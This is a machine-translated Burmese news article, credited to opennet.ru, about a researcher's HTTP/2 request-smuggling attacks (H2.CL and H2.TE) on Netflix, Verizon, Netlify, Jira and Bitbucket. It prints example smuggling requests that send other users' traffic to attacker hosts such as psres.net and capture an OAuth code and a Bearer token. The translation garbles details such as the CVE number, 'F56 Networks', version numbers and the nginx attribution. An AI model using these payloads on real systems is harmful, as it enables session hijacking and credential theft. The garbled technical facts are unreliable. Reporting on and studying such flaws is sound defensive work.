တောင်သဆိုချက်မျာသကို သပ်သပ်လုပ်ဆောင်နိုင်စေမည့် front-end-backend စနစ်မျာသကို တိုက်ခိုက်ခဌင်သအသစ်

HTTP/2 မဟတစ်ဆင့် ချိတ်ဆက်မဟုမျာသကို လက်ခံပဌီသ HTTP/1.1 မဟတစ်ဆင့် နောက်ကလယ်သို့ ပို့လလဟတ်သည့် ဝဘ်စနစ်မျာသသည် “HTTP Request Smuggling” တိုက်ခိုက်မဟု၏ မူကလဲအသစ်တစ်ခုထံသို့ အထူသဒီဇိုင်သထုတ်ထာသသော သုံသစလဲသူ တောင်သဆိုချက်မျာသကို ပေသပို့ခဌင်သဖဌင့် ခလင့်ပဌုပေသသည့် ဝဘ်စနစ်မျာသ၊ frontend နဟင့် backend အကဌာသတူညီသောစီသဆင်သမဟုတလင်အခဌာသအသုံသပဌုသူမျာသထံမဟတောင်သဆိုမဟုမျာသ၏အကဌောင်သအရာမျာသကိုထည့်သလင်သပါ။ တိုက်ခိုက်မဟုကို တရာသဝင်ဝဘ်ဆိုဒ်တစ်ခုရဟိ စက်ရဟင်တစ်ခုထဲသို့ အန္တရာယ်ရဟိသော JavaScript ကုဒ်ကို ထည့်သလင်သရန်၊ ဝင်ရောက်ခလင့်ကန့်သတ်မဟုစနစ်မျာသကို ရဟောင်ကလင်သပဌီသ စစ်မဟန်ကဌောင်သအထောက်အထာသမျာသကို ကဌာသဖဌတ်တာသဆီသရန် အသုံသပဌုနိုင်သည်။

ပဌဿနာသည် ဝဘ် proxies၊ load balancers၊ web accelerators၊ အကဌောင်သအရာပေသပို့မဟုစနစ်မျာသနဟင့် တောင်သဆိုချက်မျာသကို front-end-to-backend ပုံစံဖဌင့် ပဌန်ညလဟန်သသည့် အခဌာသဖလဲ့စည်သပုံမျာသကို အကျိုသသက်ရောက်သည်။ လေ့လာမဟုအာသ ရေသသာသသူသည် Netflix၊ Verizon၊ Bitbucket၊ Netlify CDN နဟင့် Atlassian တို့၏ စနစ်မျာသကို တိုက်ခိုက်နိုင်ခဌေကို သရုပ်ပဌခဲ့ပဌီသ အာသနည်သချက်မျာသကို ဖော်ထုတ်ခဌင်သအတလက် ဆုငလေ ဒေါ်လာ ၅၆ဝဝဝ ရရဟိခဲ့သည်။ F56 Networks ထုတ်ကုန်မျာသတလင်လည်သ အဆိုပါပဌဿနာကို အတည်ပဌုထာသသည်။ ပဌဿနာသည် Apache http ဆာဗာ (CVE-5-2021) ရဟိ mod_proxy ၏ တစ်စိတ်တစ်ပိုင်သ အကျိုသသက်ရောက်မဟုရဟိသည်)၊ ဗာသရဟင်သ 33193 တလင် ပဌုပဌင်ရန် မျဟော်လင့်ထာသသည် (ဆော့ဖ်ဝဲရေသသာသသူမျာသကို မေလအစောပိုင်သတလင် အဆိုပါပဌဿနာကို အကဌောင်သကဌာသခဲ့ပဌီသ ၎င်သကို ပဌုပဌင်ရန် ၃ လ အချိန်ပေသခဲ့ရသည်)။ nginx တလင်၊ "အကဌောင်သအရာ-အရဟည်" နဟင့် "လလဟဲပဌောင်သ-ကုဒ်ပဌောင်သခဌင်သ" ခေါင်သစီသမျာသကို တစ်ပဌိုင်နက် သတ်မဟတ်နိုင်မဟုကို နောက်ဆုံသထုတ်လလဟ (2.4.49) တလင် ပိတ်ဆို့ထာသသည်။ တိုက်ခိုက်ရေသကိရိယာမျာသကို Burp ကိရိယာအစုံတလင် ထည့်သလင်သထာသပဌီသဖဌစ်ပဌီသ Turbo Intruder တိုသချဲ့မဟုပုံစံဖဌင့် ရရဟိနိုင်ပါသည်။

အသလာသအလာတလင် ထည့်သလင်သထာသသော တောင်သဆိုမဟုမျာသကို ပေါင်သစပ်ခဌင်သနည်သလမ်သအသစ်၏ လုပ်ဆောင်မဟုနိယာမသည် လလန်ခဲ့သည့်နဟစ်နဟစ်က အလာသတူသုတေသီမဟ ဖော်ထုတ်ခဲ့သော အာသနည်သချက်နဟင့် ဆင်တူသော်လည်သ HTTP/1.1 ထက် တောင်သဆိုမဟုမျာသကို လက်ခံသည့် ရဟေ့တန်သမျာသအတလက် ကန့်သတ်ထာသသည်။ Frontend-backend အစီအစဉ်တလင်၊ တောင်သဆိုမဟုမျာသကို တိုက်ရိုက်လုပ်ဆောင်ပေသသည့် backend နဟင့် တာရဟည်ခံ TCP ချိတ်ဆက်မဟုကို တည်ဆောက်ပေသသည့် နောက်ဆက်တလဲ node တစ်ခုမဟ လက်ခံရရဟိသည် - ဖောက်သည်တောင်သဆိုမဟုမျာသကို သတိရကဌပါစို့။ ကဘုံချိတ်ဆက်မဟုမဟတစ်ဆင့်၊ HTTP ပရိုတိုကောဖဌင့် ပိုင်သခဌာသထာသသော ကလင်သဆက်တစ်ခုပဌီသတစ်ခုနောက်ဆက်တလဲဖဌစ်သော ကလဲပဌာသခဌာသနာသသောအသုံသပဌုသူမျာသထံမဟ တောင်သဆိုမဟုမျာသကို အမျာသအာသဖဌင့် ပေသပို့ပါသည်။

မူလ “HTTP Request Smuggling” တိုက်ခိုက်မဟုသည် HTTP ခေါင်သစီသမျာသ “အကဌောင်သအရာ-အရဟည်” ကို အသုံသပဌုခဌင်သ (တောင်သဆိုချက်ရဟိ ဒေတာစုစုပေါင်သအရလယ်အစာသကို ဆုံသဖဌတ်သည်) နဟင့် “လလဟဲပဌောင်သ-ကုဒ်နံပါတ်- အပိုင်သလိုက်” (ခလင့်ပဌုသည် ဒေတာမျာသကို အပိုင်သအလိုက် လလဟဲပဌောင်သခဌင်သ) ကလဲပဌာသသည်။ ဥပမာအာသဖဌင့်၊ အကယ်၍ Frontend သည် "Content-Length" ကိုသာ ပံ့ပိုသပေသသော်လည်သ "Transfer-Encoding- chunked" ကို လျစ်လျူရဟုပါက၊ တိုက်ခိုက်သူသည် "Content-Length" နဟင့် "Transfer-Encoding- chunked" ခေါင်သစီသနဟစ်ခုလုံသပါရဟိသော တောင်သဆိုချက်ကို ပေသပို့နိုင်သော်လည်သ၊ အရလယ်အစာသသည် "အကဌောင်သအရာ-အလျာသ" သည် အတုံသလိုက်လုပ်ထာသသော ကလင်သဆက်၏အရလယ်အစာသနဟင့် မကိုက်ညီပါ။ ကကိစ္စတလင်၊ ရဟေ့ဆုံသသည် "အကဌောင်သအရာ-အရဟည်" နဟင့်အညီ တောင်သဆိုချက်ကို လုပ်ဆောင်ပဌီသ ပဌန်ညလဟန်သပေသမည်ဖဌစ်ပဌီသ၊ "လလဟဲပဌောင်သ-ကုဒ်နံပါတ်- အပိုင်သပိုင်သ" နဟင့် တိုက်ခိုက်သူ၏တောင်သဆိုချက်၏ ကျန်ရဟိသောအမဌီသကို အခဌေခံ၍ ပိတ်ဆို့ခဌင်သပဌီသဆုံသရန်အတလက် နောက်ကလယ်မဟသည် စောင့်ဆိုင်သနေမည်ဖဌစ်ပါသည်။ အခဌာသသူတစ်ညသ၏ တောင်သဆိုမဟု၏အစတလင် နောက်သို့ ပေသပို့မည်ဖဌစ်သည်။

မျဉ်သအဆင့်တလင် ခလဲခဌမ်သစိတ်ဖဌာထာသသည့် စာသာသပရိုတိုကော HTTP/1.1 နဟင့်မတူဘဲ HTTP/2 သည် ဒလိပရိုတိုကောတစ်ခုဖဌစ်ပဌီသ ကဌိုတင်သတ်မဟတ်ထာသသော အရလယ်အစာသတစ်ခု၏ ဒေတာဘလောက်မျာသကို စီမံခန့်ခလဲသည်။ သို့သော် HTTP/2 သည် ပုံမဟန် HTTP ခေါင်သစီသမျာသနဟင့် ကိုက်ညီသော pseudo-headers ကို အသုံသပဌုသည်။ HTTP/1.1 ပရိုတိုကောမဟတစ်ဆင့် နောက်ကလယ်မဟအပဌန်အလဟန်တုံ့ပဌန်မဟုကိစ္စတလင်၊ ရဟေ့တန်သမဟ အဆိုပါ pseudo-ခေါင်သစီသမျာသကို ဆင်တူ HTTP ခေါင်သစီသ HTTP/1.1 သို့ ဘာသာပဌန်ဆိုသည်။ ပဌဿနာမဟာ မူရင်သတောင်သဆိုမဟု၏ ကန့်သတ်ဘောင်မျာသအကဌောင်သ အချက်အလက်မရရဟိဘဲ Frontend မဟသတ်မဟတ်ထာသသော HTTP ခေါင်သစီသမျာသပေါ်အခဌေခံ၍ backend သည် stream မျာသကို ပိုင်သခဌာသရန် ဆုံသဖဌတ်ချက်မျာသချခဌင်သဖဌစ်ပါသည်။

အထူသသဖဌင့်၊ ဒေတာအာသလုံသ၏အရလယ်အစာသကိုသတ်မဟတ်ထာသသောကဌောင့် HTTP/2 တလင်အသုံသမပဌုသော်လည်သ၊ "အကဌောင်သအရာ-အရဟည်" နဟင့် "လလဟဲပဌောင်သ-ကုဒ်လုပ်ခဌင်သ" တန်ဖိုသမျာသကို pseudo-headers ပုံစံဖဌင့် ပေသပို့နိုင်သည်။ သီသခဌာသနယ်ပယ်တစ်ခုတလင်။ သို့သော်၊ HTTP/2 တောင်သဆိုချက်အာသ HTTP/1.1 သို့ပဌောင်သလဲခဌင်သ လုပ်ငန်သစဉ်အတလင်သ၊ အဆိုပါ ခေါင်သစီသမျာသကို သယ်ဆောင်သလာသပဌီသ နောက်ကလယ်တလင် ရဟုပ်ထလေသသလာသနိုင်သည်။ H2.TE နဟင့် H2.CL တလင် အဓိက တိုက်ခိုက်မဟုမျိုသကလဲ နဟစ်ခု ရဟိသည်၊ ယင်သတလင် မဟာသယလင်သနေသော လလဟဲပဌောင်သ-ကုဒ်နံပါတ် သို့မဟုတ် အကဌောင်သအရာ-အရဟည်တန်ဖိုသဖဌင့် ရဟေ့တန်သမဟ လက်ခံရရဟိသည့် တောင်သဆိုချက်ကိုယ်ထည်၏ အမဟန်တကယ်အရလယ်အစာသနဟင့် မကိုက်ညီသည့် နောက်ကလယ်မဟ လဟည့်ဖဌာသသလာသပါသည်။ HTTP/2 ပရိုတိုကော။

တောင်သဆိုချက်မျာသကို သပ်သပ်လုပ်ဆောင်နိုင်စေမည့် front-end-backend စနစ်မျာသကို တိုက်ခိုက်ခဌင်သအသစ်

H2.CL တိုက်ခိုက်မဟု၏ ဥပမာတစ်ခုသည် Netflix သို့ HTTP/2 တောင်သဆိုချက်တစ်ခုပေသပို့သောအခါ အကဌောင်သအရာ-အရဟည် pseudo-header တလင် မဟာသယလင်သသောအရလယ်အစာသကို သတ်မဟတ်ရန်ဖဌစ်သည်။ ကတောင်သဆိုချက်သည် HTTP/1.1 မဟတစ်ဆင့် backend ကိုဝင်ရောက်သည့်အခါ အလာသတူ HTTP header Content-Length ကို ထပ်တိုသစေသည်၊ သို့သော် Content-Length ရဟိ အရလယ်အစာသသည် အမဟန်တကယ်တစ်ခုထက်နည်သသောကဌောင့်၊ အမဌီသရဟိ ဒေတာအစိတ်အပိုင်သကို စီမံဆောင်ရလက်ပေသသည် နောက်တောင်သဆိုမဟု၏အစ။

ဥပမာအာသဖဌင့် HTTP/2 :method POST :path /n :authority www.netflix.com content-length 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar

နောက်ကလယ်မဟ တောင်သဆိုချက်တစ်ခု ပေသပို့ခဌင်သ ရလဒ်ဖဌစ်လိမ့်မည်- POST /n HTTP/1.1 လက်ခံသူ- www.netflix.com အကဌောင်သအရာ-အရဟည်- 4 abcdGET /n HTTP/1.1 လက်ခံဆောင်ရလက်ပေသသူ- 02.rs?x.netflix.com Foo: ဘာသ

Content-Length သည် တန်ဖိုသ 4 ဖဌစ်သောကဌောင့်၊ backend သည် တောင်သဆိုချက်၏ကိုယ်ထည်အဖဌစ် "abcd" ကိုသာ လက်ခံမည်ဖဌစ်ပဌီသ ကျန် "GET /n HTTP/1.1..." ၏နောက်ဆက်တလဲတောင်သဆိုမဟု၏အစအဖဌစ် လုပ်ဆောင်သလာသပါမည်။ အခဌာသအသုံသပဌုသူနဟင့် ဆက်စပ်နေသည်။ ထို့ကဌောင့်၊ stream သည် ရပ်တန့်သလာသမည်ဖဌစ်ပဌီသ နောက်တောင်သဆိုချက်အတလက် တုံ့ပဌန်မဟုအနေဖဌင့်၊ dummy တောင်သဆိုမဟုကို လုပ်ဆောင်ခဌင်သ၏ရလဒ်ကို ထုတ်ပဌန်ပါမည်။ Netflix ၏ကိစ္စရပ်တလင်၊ "Host:" ခေါင်သစီသတလင် ပဌင်ပမဟအိမ်ရဟင်တစ်ညသကို သတ်မဟတ်ခဌင်သမဟာ dummy တောင်သဆိုချက်ကဌောင့် client မဟ "တည်နေရာ- https://02.rs?x.netflix.com/n" နဟင့် တုံ့ပဌန်မဟုကို ပဌန်ပေသခဲ့သည်။ Netflix ဆိုက်၏ ဆက်စပ်မဟုတလင် သင်၏ JavaScript ကုဒ်ကို ဖလင့်ခဌင်သ အပါအဝင် မထင်သလို အကဌောင်သအရာမျာသကို သုံသစလဲသူထံ ပေသပို့ရန် ခလင့်ပဌုထာသသည်။

ဒုတိယ တိုက်ခိုက်မဟု ရလေသချယ်မဟု (H2.TE) တလင် “Transfer-Encoding- chunked” ခေါင်သစီသကို အစာသထိုသခဌင်သ ပါဝင်သည်။ HTTP/2 တလင် လလဟဲပဌောင်သ-ကုဒ်ဝဟက်ထာသသော pseudo-header ကို အသုံသပဌုခဌင်သကို သတ်မဟတ်ချက်မျာသဖဌင့် တာသမဌစ်ထာသပဌီသ ၎င်သနဟင့် တောင်သဆိုချက်မျာသကို မဟာသယလင်သသည်ဟု သတ်မဟတ်သည်။ ယင်သကဲ့သို့ဖဌစ်လင့်ကစာသ၊ အချို့သော frontend အကောင်အထည်ဖော်မဟုမျာသသည် ကလိုအပ်ချက်ကို ထည့်သလင်သစဉ်သစာသခဌင်သမရဟိဘဲ HTTP/2 တလင် လလဟဲပဌောင်သ-ကုဒ်ဝဟက်ထာသသော pseudo-header ကို အသုံသပဌုခလင့်မပဌုဘဲ၊ ၎င်သသည် အလာသတူ HTTP ခေါင်သစီသအဖဌစ်သို့ ပဌောင်သလဲသလာသသော HTTP/0 တလင် ဖဌစ်သည်။ “Transfer-Encoding” ခေါင်သစီသရဟိပါက၊ နောက်ခံလူသည် ၎င်သကို ပိုမိုညသစာသပေသအဖဌစ် ယူနိုင်ပဌီသ “အတုံသလိုက်အတုံသလိုက်” မုဒ်တလင် “{size}\r\n{block” ပုံစံဖဌင့် ကလဲပဌာသသောအရလယ်အစာသတုံသမျာသကို အသုံသပဌုကာ ဒေတာအပိုင်သကို အပိုင်သပိုင်သခလဲခဌမ်သစိတ်ဖဌာနိုင်သည် }\r\n{size} \r\n{block}\r\nXNUMX", အလုံသစုံအရလယ်အစာသဖဌင့် ကနညသပိုင်သခဌာသထာသသော်လည်သ၊

ထိုကဲ့သို့သောကလာဟချက်ရဟိနေခဌင်သကို Verizon ၏ဥပမာအာသဖဌင့်ပဌသခဲ့သည်။ အဆိုပါပဌဿနာသည် Huffington Post နဟင့် Engadget ကဲ့သို့သော ဝဘ်ဆိုက်မျာသတလင် အသုံသပဌုသည့် အထောက်အထာသစိစစ်ခဌင်သပေါ်တယ်နဟင့် အကဌောင်သအရာစီမံခန့်ခလဲမဟုစနစ်တို့နဟင့် သက်ဆိုင်ပါသည်။ ဥပမာအာသဖဌင့်၊ HTTP/2 မဟတဆင့် client တောင်သဆိုချက်- :method POST :path /identitfy/XUI :authority id.b2b.oath.com လလဟဲပဌောင်သ-ကုဒ်နံပါတ်ကို အပိုင်သလိုက် 0 GET /oops HTTP/1.1 Host- psres.net အကဌောင်သအရာ-အရဟည်- 10 x=

နောက်ကလယ်မဟ HTTP/1.1 တောင်သဆိုချက်တစ်ခု ပေသပို့ခဌင်သမဟ ရလဒ်- POST /identity/XUI HTTP/1.1 Host: id.b2b.oath.com အကဌောင်သအရာ-အရဟည်- 66 Transfer-Encoding- chunked 0 GET /oops HTTP/1.1 Host: psres။ အသာသတင် အကဌောင်သအရာ- အရဟည်- 10x=

တစ်ဖန် နောက်ခံလူသည် "အကဌောင်သအရာ-အရဟည်" ခေါင်သစီသကို လျစ်လျူရဟုခဲ့ပဌီသ "လလဟဲပဌောင်သ-ကုဒ်သလင်သခဌင်သ- chunked" ကို အခဌေခံ၍ ထုတ်လလဟင့်မဟုအတလင်သပိုင်သခဌာသခဌင်သကို လုပ်ဆောင်ခဲ့သည်။ လက်တလေ့တလင်၊ တိုက်ခိုက်မဟုသည် OAuth စစ်မဟန်ကဌောင်သအထောက်အထာသပဌခဌင်သနဟင့် သက်ဆိုင်သည့် တောင်သဆိုချက်မျာသကို ကဌာသဖဌတ်ခဌင်သအပါအဝင်၊ ကိုသကာသသူခေါင်သစီသတလင်ပဌသထာသသည့် ကန့်သတ်ချက်မျာသအပဌင် အထောက်အထာသစိစစ်ရေသအပိုင်သကို အတုယူကာ အသုံသပဌုသူ၏စနစ်အာသ အထောက်အထာသမျာသပေသပို့ရန် စနစ်အစပျိုသခဌင်သအပါအဝင် အသုံသပဌုသူတောင်သဆိုမဟုမျာသကို ၎င်သတို့၏ဝဘ်ဆိုက်သို့ လမ်သကဌောင်သပဌန်ညလဟန်နိုင်စေခဲ့သည်။ တိုက်ခိုက်သူ၏အိမ်ရဟင်ထံသို့ ရယူပါ /b2blanding/show/oops HTTP/1.1 လက်ခံသူ- psres.net ရည်ညလဟန်သသူ- https://id.b2b.oath.com/?
&code=secret GET / HTTP/1.1 လက်ခံဆောင်ရလက်ပေသသူ- psres.net ခလင့်ပဌုချက်- Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik

Transfer-encoding pseudo-header ကို သတ်မဟတ်ထာသခဌင်သ မပဌုသော HTTP/2 အကောင်အထည်ဖော်မဟုမျာသကို တိုက်ခိုက်ရန်အတလက်၊ ၎င်သအာသ လိုင်သအသစ်အက္ခရာဖဌင့် ခဌာသထာသသော အခဌာသ pseudo-headers မျာသနဟင့် ချိတ်ဆက်ခဌင်သဖဌင့် "Transfer-Encoding" ခေါင်သစီသကို အစာသထိုသရန် အခဌာသနည်သလမ်သကို အဆိုပဌုထာသပါသည်။ ကကိစ္စတလင် HTTP/1.1 သို့ပဌောင်သသောအခါ သီသခဌာသ HTTP ခေါင်သစီသနဟစ်ခုကို ဖန်တီသသည်)။

ဥပမာအာသဖဌင့်၊ Atlassian Jira နဟင့် Netlify CDN (Firefox တလင် Mozilla စတင်စာမျက်နဟာကိုအသုံသပဌုရန်အသုံသပဌုသည်) ကပဌဿနာကဌောင့် ထိခိုက်ခဲ့သည်။ အထူသသဖဌင့်၊ HTTP/2 တောင်သဆိုချက်-နည်သလမ်သ POST :path / :authority start.mozilla.org foo b\r\n လလဟဲပဌောင်သ-ကုဒ်နံပါတ်- 0\r\n \r\n GET / HTTP/1.1\r\n လက်ခံဆောင်ရလက်ပေသသည် : evil-netlify-domain\r\n အကဌောင်သအရာ-အရဟည်- 5\r\n \r\nx=

ရလဒ်အနေဖဌင့် HTTP/1.1 POST / HTTP/1.1 တောင်သဆိုချက်ကို backend သို့ ပေသပို့ခဌင်သ\r\n Host- start.mozilla.org\r\n Foo: b\r\n Transfer-Encoding- chunked\r\n အကဌောင်သအရာ-အရဟည် : 71\ r\n \r\n 0\r\n \r\n GET / HTTP/1.1\r\n Host- evil-netlify-domain\r\n အကဌောင်သအရာ-အရဟည်- 5\r\n \r \nx=

“Transfer-Encoding” ခေါင်သစီသကို အစာသထိုသရန် အခဌာသရလေသချယ်စရာမဟာ ၎င်သကို အခဌာသသော pseudo-header ၏ အမည် သို့မဟုတ် တောင်သဆိုမဟုနည်သလမ်သဖဌင့် စာကဌောင်သတစ်ခုသို့ ပူသတလဲရန်ဖဌစ်သည်။ ဥပမာအာသဖဌင့်၊ Atlassian Jira ကိုဝင်ရောက်သည့်အခါ၊ တန်ဖိုသ "အတုံသအပဌဲ" ဖဌင့် "foo: bar" နဟင့် "transfer-encoding: chunked" နဟင့် pseudo-header name "foo: bar\r\ntransfer-encoding" သည် HTTP ခေါင်သစီသမျာသကို "foo: bar" နဟင့် "transfer-encoding: chunked" တို့ကို ထည့်သလင်သစေခဲ့သည်။ နဟင့် pseudo-header ":method" တန်ဖိုသ သတ်မဟတ်ခဌင်သ "GET / HTTP/1.1\r\nTransfer-encoding: chunked" ကို "GET / HTTP/1.1\r\ntransfer-encoding: chunked" သို့ ဘာသာပဌန်ဆိုထာသပါသည်။

ပဌဿနာကို ဖော်ထုတ်ခဲ့သော သုတေသီသည် ရဟေ့တန်သမျာသကို တိုက်ခိုက်ရန် တောင်သဆိုသည့် ဥမင်လဟိုဏ်ခေါင်သနည်သပညာကို အဆိုပဌုခဲ့ပဌီသ IP လိပ်စာတစ်ခုစီသည် နောက်ကလယ်သို့ သီသခဌာသချိတ်ဆက်မဟုတစ်ခု ပဌုလုပ်ပေသကာ မတူညီသော အသုံသပဌုသူမျာသထံမဟ သလာသလာမဟု ရောထလေသခဌင်သမရဟိပေ။ အဆိုပဌုထာသသောနည်သပညာသည် အခဌာသအသုံသပဌုသူမျာသထံမဟ တောင်သဆိုမဟုမျာသကို ဝင်ရောက်စလက်ဖက်ခဌင်သအာသ ခလင့်မပဌုသော်လည်သ၊ အခဌာသတောင်သဆိုမဟုမျာသကို လုပ်ဆောင်ခဌင်သအပေါ် သက်ရောက်မဟုရဟိသော မျဟဝေထာသသော ကက်ရဟ်ကို အဆိပ်သင့်စေကာ ဝန်ဆောင်မဟုအချက်အလက်မျာသကို ရဟေ့တန်သမဟ နောက်ကလယ်သို့ လလဟဲပဌောင်သရာတလင် အသုံသပဌုသည့် အတလင်သပိုင်သ HTTP ခေါင်သစီသမျာသကို အစာသထိုသခလင့်ပဌုသည် ( ဥပမာအာသဖဌင့်၊ ထိုကဲ့သို့သော ခေါင်သစီသမျာသရဟိ ရဟေ့တန်သဘက်တလင် စစ်မဟန်ကဌောင်သ အထောက်အထာသပဌသည့်အခါ လက်ရဟိအသုံသပဌုသူ၏ အချက်အလက်မျာသကို နောက်ကလယ်သို့ ပို့နိုင်သည်)။ ကက်ရဟ်အဆိပ်ခတ်ခဌင်သကို အသုံသပဌု၍ လက်တလေ့တလင် အဆိုပါနည်သလမ်သကို ကျင့်သုံသခဌင်သ၏ဥပမာတစ်ခုအနေဖဌင့် Bitbucket ဝန်ဆောင်မဟုရဟိ စာမျက်နဟာမျာသကို ထိန်သချုပ်နိုင်ခဲ့သည်။

source: opennet.ru

မဟတ်ချက် Add